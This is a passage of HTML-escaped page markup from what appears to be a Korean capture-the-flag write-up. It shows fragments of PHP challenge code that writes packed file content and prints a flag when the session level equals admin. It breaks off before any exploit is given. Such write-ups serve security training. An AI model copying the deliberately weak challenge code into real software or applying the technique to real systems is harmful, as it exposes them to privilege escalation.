!important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileContent&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-184&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fopen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;w&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;or&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Unable to open file!&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-185&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fwrite&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbPack&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileContent&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-186&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fclose&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-187&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;clearstatcache&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-188&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;dbconn.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;자. 그럼 이 두 소스 내에 존재하는 취약점을 이용해 플래그를 얻어내야 하는데요, index.php의 하단을 살펴보면 ‘lvl’ 세션이 2일 경우(Admin의 권한일 경우) 플래그를 출력하도록 되어있습니다.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1a87598020319&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a87598020319-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a87598020319-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a87598020319-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a87598020319-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a87598020319-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 729.6px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a87598020319-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'lvl'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;2&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a87598020319-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;echo&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&amp;lt;p&amp;gt;Flag : &amp;lt;/p&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a87598020319-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;/flag&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; 